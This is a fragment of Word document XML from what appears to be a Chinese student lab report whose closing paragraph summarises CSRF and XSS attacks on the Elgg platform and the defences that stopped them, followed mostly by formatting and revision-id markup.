          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CSRF攻击和XSS攻击，并实现了漏洞利用，完成了CSRF攻击和XSS攻击，实现了修改用户数据、执行非预期操作、泄漏隐私信息、蠕虫传播等多种攻击目标。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B1F00F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除了攻击外，还了解了常用的防御手段，如Elgg与PHP自带的防御手段，开启防御手段避免了CSRF攻击与XSS攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7759392A">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="30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通过实验了解了网站开发可能存在的漏洞以及对应的风险，学习到在实际的网站应用开发中，应尽可能多的开启安全防御机制，避免攻击造成用户数据泄漏和篡改。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8A7D61">
    <w:pPr>
      <w:pStyle w:val="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FB76CA">
    <w:pPr>
      <w:pStyle w:val="7"/>
      <w:framePr w:wrap="around" w:vAnchor="text" w:hAnchor="margin" w:xAlign="right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 w14:paraId="41AEF845">
    <w:pPr>
      <w:pStyle w:val="7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C8FA8A">
    <w:pPr>
      <w:pStyle w:val="7"/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951D08">
                          <w:pPr>
                            <w:pStyle w:val="7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PAGE   \* MERGEFORMAT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9bQWsy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/1tBa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6951D08">
                    <w:pPr>
                      <w:pStyle w:val="7"/>
                      <w:jc w:val="right"/>
                    </w:pPr>
                    <w:r>
                      <w:fldChar w:fldCharType="begin"/>
                    </w:r>
                    <w:r>
                      <w:instrText xml:space="preserve">PAGE   \* MERGEFORMAT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E6D5464">
    <w:pPr>
      <w:pStyle w:val="7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7B49F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F7B49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DCE0BDB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ADCE0B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7F6E7A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C7F6E7A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BEE9934"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DBEE99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DF3A0400"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF3A04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EDF49338"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="EDF49338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>
    <w:nsid w:val="F1BA1FEA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F1BA1FEA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F6FE2B1E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F6FE2B1E"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8">
    <w:nsid w:val="F7ED161D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F7ED161D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FADC3145"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FADC31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BEF7E06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBEF7E06"/>
    <w:lvl w:ilvl="0" w:tentative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134" w:leftChars="0" w:hanging="1134" w:firstLineChars="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FEAC289C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FEAC289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FF5A67A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF5A67A0"/>
    <w:lvl w:ilvl="0" w:tentative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937"/>
        </w:tabs>
        <w:ind w:left="330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658"/>
        </w:tabs>
        <w:ind w:left="402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4378"/>
        </w:tabs>
        <w:ind w:left="474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5098"/>
        </w:tabs>
        <w:ind w:left="546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818"/>
        </w:tabs>
        <w:ind w:left="618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538"/>
        </w:tabs>
        <w:ind w:left="6900" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13">
    <w:nsid w:val="FFFAFF07"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFFAFF07"/>
    <w:lvl w:ilvl="0" w:tentative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937"/>
        </w:tabs>
        <w:ind w:left="330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658"/>
        </w:tabs>
        <w:ind w:left="402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4378"/>
        </w:tabs>
        <w:ind w:left="474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5098"/>
        </w:tabs>
        <w:ind w:left="546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818"/>
        </w:tabs>
        <w:ind w:left="618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538"/>
        </w:tabs>
        <w:ind w:left="6900" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14">
    <w:nsid w:val="FFFF115E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFFF11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FFFFBC0E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FFFFBC0E"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16">
    <w:nsid w:val="4EFE5D16"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4EFE5D1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75BC0EA7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="75BC0EA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7E6E7F1A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E6E7F1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11"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="16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ZiYzY1ZmMxYjMwZDM5ZDM1NGVlOGRjYjQ1ZGUwODQifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="008A7FA8"/>
    <w:rsid w:val="00002164"/>
    <w:rsid w:val="00003700"/>
    <w:rsid w:val="00044587"/>
    <w:rsid w:val="00044CAD"/>
    <w:rsid w:val="0005520E"/>
    <w:rsid w:val="00090C2D"/>
    <w:rsid w:val="00092756"/>
    <w:rsid w:val="000A3119"/>
    <w:rsid w:val="000C1D9A"/>
    <w:rsid w:val="000C49F9"/>
    <w:rsid w:val="000D2B65"/>
    <w:rsid w:val="000D7661"/>
    <w:rsid w:val="000E1F5D"/>
    <w:rsid w:val="000F4164"/>
    <w:rsid w:val="00106DD9"/>
    <w:rsid w:val="00112B4F"/>
    <w:rsid w:val="00114792"/>
    <w:rsid w:val="00116BCA"/>
    <w:rsid w:val="0011708C"/>
    <w:rsid w:val="00117EF3"/>
    <w:rsid w:val="001375DC"/>
    <w:rsid w:val="00146142"/>
    <w:rsid w:val="00151A25"/>
    <w:rsid w:val="00170794"/>
    <w:rsid w:val="00172CD4"/>
    <w:rsid w:val="00177D38"/>
    <w:rsid w:val="00180EA8"/>
    <w:rsid w:val="00184A31"/>
    <w:rsid w:val="00192641"/>
    <w:rsid w:val="001C1847"/>
    <w:rsid w:val="001D331E"/>
    <w:rsid w:val="001E0111"/>
    <w:rsid w:val="001E62BF"/>
    <w:rsid w:val="002054F1"/>
    <w:rsid w:val="002055B0"/>
    <w:rsid w:val="00210D0A"/>
    <w:rsid w:val="00245ED9"/>
    <w:rsid w:val="00246372"/>
    <w:rsid w:val="002529A8"/>
    <w:rsid w:val="0025715C"/>
    <w:rsid w:val="002628F3"/>
    <w:rsid w:val="002713CF"/>
    <w:rsid w:val="00280DF7"/>
    <w:rsid w:val="00281B06"/>
    <w:rsid w:val="002825C8"/>
    <w:rsid w:val="00293B67"/>
    <w:rsid w:val="002A4DE5"/>
    <w:rsid w:val="002B3841"/>
    <w:rsid w:val="002B3F12"/>
    <w:rsid w:val="002D3AFC"/>
    <w:rsid w:val="002F0086"/>
    <w:rsid w:val="00303880"/>
    <w:rsid w:val="00310A45"/>
    <w:rsid w:val="00327FE9"/>
    <w:rsid w:val="00330076"/>
    <w:rsid w:val="00331BA8"/>
    <w:rsid w:val="00342B04"/>
    <w:rsid w:val="00344299"/>
    <w:rsid w:val="00347016"/>
    <w:rsid w:val="00356930"/>
    <w:rsid w:val="003575A1"/>
    <w:rsid w:val="00364C7B"/>
    <w:rsid w:val="00371666"/>
    <w:rsid w:val="00371DD5"/>
    <w:rsid w:val="00374407"/>
    <w:rsid w:val="00377B42"/>
    <w:rsid w:val="00387CE0"/>
    <w:rsid w:val="003B28EC"/>
    <w:rsid w:val="003E7DFB"/>
    <w:rsid w:val="00412C5E"/>
    <w:rsid w:val="0043280A"/>
    <w:rsid w:val="00434C32"/>
    <w:rsid w:val="00440121"/>
    <w:rsid w:val="00444E4E"/>
    <w:rsid w:val="00452DA3"/>
    <w:rsid w:val="004709EE"/>
    <w:rsid w:val="00476D93"/>
    <w:rsid w:val="00487EC9"/>
    <w:rsid w:val="00495D38"/>
    <w:rsid w:val="00497DA5"/>
    <w:rsid w:val="004A106D"/>
    <w:rsid w:val="004A2C0E"/>
    <w:rsid w:val="004A5EED"/>
    <w:rsid w:val="004B1A20"/>
    <w:rsid w:val="004B5E56"/>
    <w:rsid w:val="004C4AD2"/>
    <w:rsid w:val="004C6D18"/>
    <w:rsid w:val="004D13CD"/>
    <w:rsid w:val="00507334"/>
    <w:rsid w:val="00517D4D"/>
    <w:rsid w:val="005263E4"/>
    <w:rsid w:val="00531100"/>
    <w:rsid w:val="005368A8"/>
    <w:rsid w:val="005467BA"/>
    <w:rsid w:val="0055033F"/>
    <w:rsid w:val="00566EA2"/>
    <w:rsid w:val="005705B2"/>
    <w:rsid w:val="005722F9"/>
    <w:rsid w:val="00575936"/>
    <w:rsid w:val="00577268"/>
    <w:rsid w:val="00584C9B"/>
    <w:rsid w:val="005A234A"/>
    <w:rsid w:val="005A35C2"/>
    <w:rsid w:val="005A3F52"/>
    <w:rsid w:val="005B29ED"/>
    <w:rsid w:val="005B50AA"/>
    <w:rsid w:val="005C322A"/>
    <w:rsid w:val="005C440E"/>
    <w:rsid w:val="005C543E"/>
    <w:rsid w:val="005E3576"/>
    <w:rsid w:val="005E5964"/>
    <w:rsid w:val="005F3DC2"/>
    <w:rsid w:val="006037E4"/>
    <w:rsid w:val="00604B36"/>
    <w:rsid w:val="00611D59"/>
    <w:rsid w:val="006217C7"/>
    <w:rsid w:val="00623775"/>
    <w:rsid w:val="00633A2B"/>
    <w:rsid w:val="00641B4B"/>
    <w:rsid w:val="00643881"/>
    <w:rsid w:val="00643A67"/>
    <w:rsid w:val="0064489D"/>
    <w:rsid w:val="00652005"/>
    <w:rsid w:val="00656AA3"/>
    <w:rsid w:val="00664BFB"/>
    <w:rsid w:val="0067063E"/>
    <w:rsid w:val="00673B06"/>
    <w:rsid w:val="00681F08"/>
    <w:rsid w:val="00694D5B"/>
    <w:rsid w:val="00695427"/>
    <w:rsid w:val="006A34FF"/>
    <w:rsid w:val="006A6846"/>
    <w:rsid w:val="006A760C"/>
    <w:rsid w:val="006B07DA"/>
    <w:rsid w:val="006B0BE2"/>
    <w:rsid w:val="006D0B24"/>
    <w:rsid w:val="006D7135"/>
    <w:rsid w:val="006E5253"/>
    <w:rsid w:val="00702818"/>
    <w:rsid w:val="007054AC"/>
    <w:rsid w:val="007069E1"/>
    <w:rsid w:val="007131B9"/>
    <w:rsid w:val="007226A7"/>
    <w:rsid w:val="00734C06"/>
    <w:rsid w:val="00740875"/>
    <w:rsid w:val="00743DF4"/>
    <w:rsid w:val="0074698B"/>
    <w:rsid w:val="00766624"/>
    <w:rsid w:val="00767B06"/>
    <w:rsid w:val="00770B8C"/>
    <w:rsid w:val="0077640C"/>
    <w:rsid w:val="007866C6"/>
    <w:rsid w:val="00787DCB"/>
    <w:rsid w:val="00790EA2"/>
    <w:rsid w:val="007956DD"/>
    <w:rsid w:val="007A4560"/>
    <w:rsid w:val="007A7577"/>
    <w:rsid w:val="007C24A2"/>
    <w:rsid w:val="007C3809"/>
    <w:rsid w:val="007D7CF1"/>
    <w:rsid w:val="00815C0E"/>
    <w:rsid w:val="00817F22"/>
    <w:rsid w:val="00840316"/>
    <w:rsid w:val="00845998"/>
    <w:rsid w:val="0086569E"/>
    <w:rsid w:val="008823C6"/>
    <w:rsid w:val="00890095"/>
    <w:rsid w:val="0089354F"/>
    <w:rsid w:val="00894EA7"/>
    <w:rsid w:val="008973F7"/>
    <w:rsid w:val="008A7FA8"/>
    <w:rsid w:val="008B6E52"/>
    <w:rsid w:val="008C2040"/>
    <w:rsid w:val="008C2563"/>
    <w:rsid w:val="008C25F2"/>
    <w:rsid w:val="008D6276"/>
    <w:rsid w:val="008E603E"/>
    <w:rsid w:val="008E7406"/>
    <w:rsid w:val="00901BBB"/>
    <w:rsid w:val="00902CE4"/>
    <w:rsid w:val="00910375"/>
    <w:rsid w:val="00913585"/>
    <w:rsid w:val="009137F7"/>
    <w:rsid w:val="00916AFC"/>
    <w:rsid w:val="00920A34"/>
    <w:rsid w:val="00921537"/>
    <w:rsid w:val="00922136"/>
    <w:rsid w:val="00946664"/>
    <w:rsid w:val="00946772"/>
    <w:rsid w:val="00946E47"/>
    <w:rsid w:val="009528C3"/>
    <w:rsid w:val="00967B82"/>
    <w:rsid w:val="009749BA"/>
    <w:rsid w:val="00975AED"/>
    <w:rsid w:val="00985051"/>
    <w:rsid w:val="00985ED7"/>
    <w:rsid w:val="00986C61"/>
    <w:rsid w:val="0099423B"/>
    <w:rsid w:val="00994A02"/>
    <w:rsid w:val="009A6CE5"/>
    <w:rsid w:val="009C2D66"/>
    <w:rsid w:val="009D272A"/>
    <w:rsid w:val="009D61B5"/>
    <w:rsid w:val="009E4310"/>
    <w:rsid w:val="009F0368"/>
    <w:rsid w:val="009F13D9"/>
    <w:rsid w:val="009F27A8"/>
    <w:rsid w:val="009F4522"/>
    <w:rsid w:val="00A07F64"/>
    <w:rsid w:val="00A15C01"/>
    <w:rsid w:val="00A2210B"/>
    <w:rsid w:val="00A5393F"/>
    <w:rsid w:val="00A71A5D"/>
    <w:rsid w:val="00A73E04"/>
    <w:rsid w:val="00A75262"/>
    <w:rsid w:val="00A849E4"/>
    <w:rsid w:val="00A84FCB"/>
    <w:rsid w:val="00A93737"/>
    <w:rsid w:val="00AA5523"/>
    <w:rsid w:val="00AA67FD"/>
    <w:rsid w:val="00AB279A"/>
    <w:rsid w:val="00AB564C"/>
    <w:rsid w:val="00AC3204"/>
    <w:rsid w:val="00AC7D4E"/>
    <w:rsid w:val="00AE00A2"/>
    <w:rsid w:val="00AE0DDD"/>
    <w:rsid w:val="00AE696E"/>
    <w:rsid w:val="00AF4EF1"/>
    <w:rsid w:val="00B0065E"/>
    <w:rsid w:val="00B02005"/>
    <w:rsid w:val="00B0462B"/>
    <w:rsid w:val="00B07419"/>
    <w:rsid w:val="00B2437E"/>
    <w:rsid w:val="00B2526F"/>
    <w:rsid w:val="00B276AD"/>
    <w:rsid w:val="00B33B00"/>
    <w:rsid w:val="00B37430"/>
    <w:rsid w:val="00B474AB"/>
    <w:rsid w:val="00B5307F"/>
    <w:rsid w:val="00B549F5"/>
    <w:rsid w:val="00B56182"/>
    <w:rsid w:val="00B74016"/>
    <w:rsid w:val="00B8357B"/>
    <w:rsid w:val="00B83EF9"/>
    <w:rsid w:val="00B87F32"/>
    <w:rsid w:val="00B92549"/>
    <w:rsid w:val="00BA2C9D"/>
    <w:rsid w:val="00BB00CB"/>
    <w:rsid w:val="00BB47BA"/>
    <w:rsid w:val="00BC533F"/>
    <w:rsid w:val="00BE2C65"/>
    <w:rsid w:val="00BE38AD"/>
    <w:rsid w:val="00BF2376"/>
    <w:rsid w:val="00BF29D6"/>
    <w:rsid w:val="00BF34C8"/>
    <w:rsid w:val="00C01E92"/>
    <w:rsid w:val="00C13F8A"/>
    <w:rsid w:val="00C21306"/>
    <w:rsid w:val="00C30F59"/>
    <w:rsid w:val="00C314BA"/>
    <w:rsid w:val="00C51276"/>
    <w:rsid w:val="00C5263D"/>
    <w:rsid w:val="00C52FC7"/>
    <w:rsid w:val="00C56A9E"/>
    <w:rsid w:val="00C86A88"/>
    <w:rsid w:val="00C907C0"/>
    <w:rsid w:val="00C94AAD"/>
    <w:rsid w:val="00CA4328"/>
    <w:rsid w:val="00CB6BE8"/>
    <w:rsid w:val="00CD2BBC"/>
    <w:rsid w:val="00CD47AC"/>
    <w:rsid w:val="00CD7FC7"/>
    <w:rsid w:val="00CE4E4F"/>
    <w:rsid w:val="00CF087A"/>
    <w:rsid w:val="00D01487"/>
    <w:rsid w:val="00D12DF8"/>
    <w:rsid w:val="00D245DB"/>
    <w:rsid w:val="00D25B50"/>
    <w:rsid w:val="00D34AC7"/>
    <w:rsid w:val="00D35310"/>
    <w:rsid w:val="00D35366"/>
    <w:rsid w:val="00D63CB6"/>
    <w:rsid w:val="00D65D6B"/>
    <w:rsid w:val="00D82DC0"/>
    <w:rsid w:val="00D87D5F"/>
    <w:rsid w:val="00D912E6"/>
    <w:rsid w:val="00DB1C6C"/>
    <w:rsid w:val="00DC3D01"/>
    <w:rsid w:val="00DD1CB7"/>
    <w:rsid w:val="00DD39CA"/>
    <w:rsid w:val="00DD550B"/>
    <w:rsid w:val="00DE0EC1"/>
    <w:rsid w:val="00DE2DD7"/>
    <w:rsid w:val="00DE4924"/>
    <w:rsid w:val="00DE68BA"/>
    <w:rsid w:val="00DF6DDC"/>
    <w:rsid w:val="00E0188B"/>
    <w:rsid w:val="00E1744F"/>
    <w:rsid w:val="00E32C60"/>
    <w:rsid w:val="00E34388"/>
    <w:rsid w:val="00E34B53"/>
    <w:rsid w:val="00E366FA"/>
    <w:rsid w:val="00E535C1"/>
    <w:rsid w:val="00E53D82"/>
    <w:rsid w:val="00E56D02"/>
    <w:rsid w:val="00E61619"/>
    <w:rsid w:val="00E62A6B"/>
    <w:rsid w:val="00E62EB6"/>
    <w:rsid w:val="00E63FB4"/>
    <w:rsid w:val="00E671FF"/>
    <w:rsid w:val="00E73481"/>
    <w:rsid w:val="00E763D9"/>
    <w:rsid w:val="00E846A1"/>
    <w:rsid w:val="00E9587E"/>
    <w:rsid w:val="00E96FDF"/>
    <w:rsid w:val="00EA2C7C"/>
    <w:rsid w:val="00EA4A23"/>
    <w:rsid w:val="00EA5596"/>
    <w:rsid w:val="00EB173C"/>
    <w:rsid w:val="00EC7197"/>
    <w:rsid w:val="00ED088D"/>
    <w:rsid w:val="00ED1718"/>
    <w:rsid w:val="00ED1A69"/>
    <w:rsid w:val="00ED3232"/>
    <w:rsid w:val="00ED4A03"/>
    <w:rsid w:val="00EE79E8"/>
    <w:rsid w:val="00EF0D62"/>
    <w:rsid w:val="00EF37BD"/>
    <w:rsid w:val="00F02FB8"/>
    <w:rsid w:val="00F054CD"/>
    <w:rsid w:val="00F12391"/>
    <w:rsid w:val="00F16772"/>
    <w:rsid w:val="00F346E3"/>
    <w:rsid w:val="00F56620"/>
    <w:rsid w:val="00F62C4F"/>
    <w:rsid w:val="00F761AA"/>
    <w:rsid w:val="00F82DFB"/>
    <w:rsid w:val="00F84513"/>
    <w:rsid w:val="00F9054A"/>
    <w:rsid w:val="00FA2A06"/>
    <w:rsid w:val="00FC3EFA"/>
    <w:rsid w:val="00FD0214"/>
    <w:rsid w:val="00FD0AF6"/>
    <w:rsid w:val="00FD1ACB"/>
    <w:rsid w:val="00FE3E17"/>
    <w:rsid w:val="00FE4060"/>
    <w:rsid w:val="00FE6F14"/>
    <w:rsid w:val="00FF3D75"/>
    <w:rsid w:val="03FA3BC9"/>
    <w:rsid w:val="0D7A9441"/>
    <w:rsid w:val="0EFBADE0"/>
    <w:rsid w:val="0FDF0C7B"/>
    <w:rsid w:val="11FF2B93"/>
    <w:rsid w:val="135746BC"/>
    <w:rsid w:val="13FEC54C"/>
    <w:rsid w:val="16FD858D"/>
    <w:rsid w:val="191C9C30"/>
    <w:rsid w:val="1AFD5541"/>
    <w:rsid w:val="1BF50F4A"/>
    <w:rsid w:val="1DBEB508"/>
    <w:rsid w:val="1DF55846"/>
    <w:rsid w:val="1E7C64D9"/>
    <w:rsid w:val="1F326A46"/>
    <w:rsid w:val="1F7F38C0"/>
    <w:rsid w:val="1FA7CCE3"/>
    <w:rsid w:val="1FFBA9F4"/>
    <w:rsid w:val="21DB1CA8"/>
    <w:rsid w:val="224D1DCC"/>
    <w:rsid w:val="23F53838"/>
    <w:rsid w:val="257F6B0D"/>
    <w:rsid w:val="25F3768D"/>
    <w:rsid w:val="27FE933C"/>
    <w:rsid w:val="2978143F"/>
    <w:rsid w:val="29BFBCF9"/>
    <w:rsid w:val="2B76689A"/>
    <w:rsid w:val="2BDB7DDD"/>
    <w:rsid w:val="2BEE7285"/>
    <w:rsid w:val="2BF555FE"/>
    <w:rsid w:val="2D7D1BB8"/>
    <w:rsid w:val="2DF52006"/>
    <w:rsid w:val="2DFF78F3"/>
    <w:rsid w:val="2E7F95C0"/>
    <w:rsid w:val="2F4FAB93"/>
    <w:rsid w:val="2FBFEB9E"/>
    <w:rsid w:val="2FE60AF4"/>
    <w:rsid w:val="2FF643B9"/>
    <w:rsid w:val="2FFFCD6E"/>
    <w:rsid w:val="31FE9022"/>
    <w:rsid w:val="335744C1"/>
    <w:rsid w:val="335EF555"/>
    <w:rsid w:val="35F5C916"/>
    <w:rsid w:val="36F5FFCA"/>
    <w:rsid w:val="373B557B"/>
    <w:rsid w:val="3777BC96"/>
    <w:rsid w:val="379BC4B7"/>
    <w:rsid w:val="37AFEC01"/>
    <w:rsid w:val="37EDC421"/>
    <w:rsid w:val="3A7B4251"/>
    <w:rsid w:val="3AB7282D"/>
    <w:rsid w:val="3ABF16F0"/>
    <w:rsid w:val="3B33ED4E"/>
    <w:rsid w:val="3B572F4B"/>
    <w:rsid w:val="3B5DB690"/>
    <w:rsid w:val="3B636412"/>
    <w:rsid w:val="3BBA41F4"/>
    <w:rsid w:val="3BF3C3CC"/>
    <w:rsid w:val="3C3F0997"/>
    <w:rsid w:val="3CB7C08E"/>
    <w:rsid w:val="3CEBCAAD"/>
    <w:rsid w:val="3CFD1B49"/>
    <w:rsid w:val="3D5756FB"/>
    <w:rsid w:val="3D7BB1C6"/>
    <w:rsid w:val="3DBFC713"/>
    <w:rsid w:val="3DBFEAA4"/>
    <w:rsid w:val="3DCD934A"/>
    <w:rsid w:val="3DDF1851"/>
    <w:rsid w:val="3DEE7CC1"/>
    <w:rsid w:val="3DF76F06"/>
    <w:rsid w:val="3DFF851C"/>
    <w:rsid w:val="3EEE4A54"/>
    <w:rsid w:val="3EFB1903"/>
    <w:rsid w:val="3EFEBD9F"/>
    <w:rsid w:val="3F37E388"/>
    <w:rsid w:val="3F3A28D9"/>
    <w:rsid w:val="3F3B6422"/>
    <w:rsid w:val="3F5EE611"/>
    <w:rsid w:val="3F5FE0ED"/>
    <w:rsid w:val="3F6F7F23"/>
    <w:rsid w:val="3F7F2F48"/>
    <w:rsid w:val="3F7F3184"/>
    <w:rsid w:val="3FBF3A71"/>
    <w:rsid w:val="3FBF5F2D"/>
    <w:rsid w:val="3FDDDA20"/>
    <w:rsid w:val="3FDF96F3"/>
    <w:rsid w:val="3FFA9033"/>
    <w:rsid w:val="3FFD7723"/>
    <w:rsid w:val="3FFF8A09"/>
    <w:rsid w:val="41FF829A"/>
    <w:rsid w:val="42F71C45"/>
    <w:rsid w:val="43F88199"/>
    <w:rsid w:val="473F140E"/>
    <w:rsid w:val="477F0408"/>
    <w:rsid w:val="4BDF2A36"/>
    <w:rsid w:val="4BFF08AE"/>
    <w:rsid w:val="4BFF3731"/>
    <w:rsid w:val="4CBF432B"/>
    <w:rsid w:val="4CFF07DE"/>
    <w:rsid w:val="4D5F3C84"/>
    <w:rsid w:val="4D767FA1"/>
    <w:rsid w:val="4DCFC7F9"/>
    <w:rsid w:val="4EDF4D10"/>
    <w:rsid w:val="4EE3F4C0"/>
    <w:rsid w:val="4EFCA131"/>
    <w:rsid w:val="4F7FD3A7"/>
    <w:rsid w:val="4F996197"/>
    <w:rsid w:val="4FB587A9"/>
    <w:rsid w:val="4FBE4C4F"/>
    <w:rsid w:val="4FDEB2C7"/>
    <w:rsid w:val="4FE5F3C6"/>
    <w:rsid w:val="51F6DE08"/>
    <w:rsid w:val="53FB8A2C"/>
    <w:rsid w:val="54E7C84E"/>
    <w:rsid w:val="55FBA9F4"/>
    <w:rsid w:val="56E520B8"/>
    <w:rsid w:val="5797C67C"/>
    <w:rsid w:val="57AF6C48"/>
    <w:rsid w:val="57BC9ADC"/>
    <w:rsid w:val="57DBE31E"/>
    <w:rsid w:val="57F7C79B"/>
    <w:rsid w:val="59978BEB"/>
    <w:rsid w:val="5BEF63F8"/>
    <w:rsid w:val="5BF2EF63"/>
    <w:rsid w:val="5BFFFA41"/>
    <w:rsid w:val="5CCAF4FD"/>
    <w:rsid w:val="5DBE6450"/>
    <w:rsid w:val="5DBFEB12"/>
    <w:rsid w:val="5DF74001"/>
    <w:rsid w:val="5DFF91E4"/>
    <w:rsid w:val="5DFFE975"/>
    <w:rsid w:val="5E394863"/>
    <w:rsid w:val="5E9B63EB"/>
    <w:rsid w:val="5EE7DB8F"/>
    <w:rsid w:val="5EEC1006"/>
    <w:rsid w:val="5EEEDEF2"/>
    <w:rsid w:val="5EFCCBE9"/>
    <w:rsid w:val="5F2E222C"/>
    <w:rsid w:val="5F6D9E8E"/>
    <w:rsid w:val="5F77CB34"/>
    <w:rsid w:val="5F7F3D9C"/>
    <w:rsid w:val="5FBE0756"/>
    <w:rsid w:val="5FD5B810"/>
    <w:rsid w:val="5FDB86CD"/>
    <w:rsid w:val="5FDE3DD0"/>
    <w:rsid w:val="5FDF0117"/>
    <w:rsid w:val="5FEB29C7"/>
    <w:rsid w:val="5FEFB71A"/>
    <w:rsid w:val="5FF704D8"/>
    <w:rsid w:val="5FFA521A"/>
    <w:rsid w:val="5FFDCB9F"/>
    <w:rsid w:val="5FFF4B16"/>
    <w:rsid w:val="63D1139F"/>
    <w:rsid w:val="65D97627"/>
    <w:rsid w:val="65EF6887"/>
    <w:rsid w:val="65F3B984"/>
    <w:rsid w:val="662DC9CE"/>
    <w:rsid w:val="66BF571D"/>
    <w:rsid w:val="6767826A"/>
    <w:rsid w:val="67CF7393"/>
    <w:rsid w:val="67D7FCAA"/>
    <w:rsid w:val="67DED996"/>
    <w:rsid w:val="67EBA91C"/>
    <w:rsid w:val="68F7618E"/>
    <w:rsid w:val="69EE3D10"/>
    <w:rsid w:val="69F76745"/>
    <w:rsid w:val="6A5527D2"/>
    <w:rsid w:val="6AFDE84E"/>
    <w:rsid w:val="6C7777AD"/>
    <w:rsid w:val="6CFF4C99"/>
    <w:rsid w:val="6D36D71E"/>
    <w:rsid w:val="6DB94EEB"/>
    <w:rsid w:val="6DF3B3E2"/>
    <w:rsid w:val="6E35BA4C"/>
    <w:rsid w:val="6E5F511C"/>
    <w:rsid w:val="6EBE8F2D"/>
    <w:rsid w:val="6EBF41F2"/>
    <w:rsid w:val="6EFB9CDB"/>
    <w:rsid w:val="6EFBB7FF"/>
    <w:rsid w:val="6EFEA809"/>
    <w:rsid w:val="6EFF296C"/>
    <w:rsid w:val="6F3FD995"/>
    <w:rsid w:val="6F689CA9"/>
    <w:rsid w:val="6F7FB9F8"/>
    <w:rsid w:val="6F978D80"/>
    <w:rsid w:val="6FBCAD9D"/>
    <w:rsid w:val="6FBFC4C9"/>
    <w:rsid w:val="6FDB714C"/>
    <w:rsid w:val="6FE75C7A"/>
    <w:rsid w:val="6FEB19E8"/>
    <w:rsid w:val="6FEC6CC7"/>
    <w:rsid w:val="6FEFA20F"/>
    <w:rsid w:val="6FFC6506"/>
    <w:rsid w:val="6FFD9015"/>
    <w:rsid w:val="6FFE3F5D"/>
    <w:rsid w:val="719AFC64"/>
    <w:rsid w:val="71ED738F"/>
    <w:rsid w:val="71F57FBB"/>
    <w:rsid w:val="71F61323"/>
    <w:rsid w:val="73738603"/>
    <w:rsid w:val="737E7A7C"/>
    <w:rsid w:val="73EF2674"/>
    <w:rsid w:val="73EFD6B3"/>
    <w:rsid w:val="73FEE655"/>
    <w:rsid w:val="74E9BFC1"/>
    <w:rsid w:val="74F6E1B5"/>
    <w:rsid w:val="74FA9F24"/>
    <w:rsid w:val="75BDC8F2"/>
    <w:rsid w:val="75F757CD"/>
    <w:rsid w:val="75FFE532"/>
    <w:rsid w:val="762715A6"/>
    <w:rsid w:val="76BFC985"/>
    <w:rsid w:val="76DDDF98"/>
    <w:rsid w:val="76ED5B55"/>
    <w:rsid w:val="76FF9288"/>
    <w:rsid w:val="76FFFF9D"/>
    <w:rsid w:val="773D992C"/>
    <w:rsid w:val="77662E5E"/>
    <w:rsid w:val="7767326E"/>
    <w:rsid w:val="77772755"/>
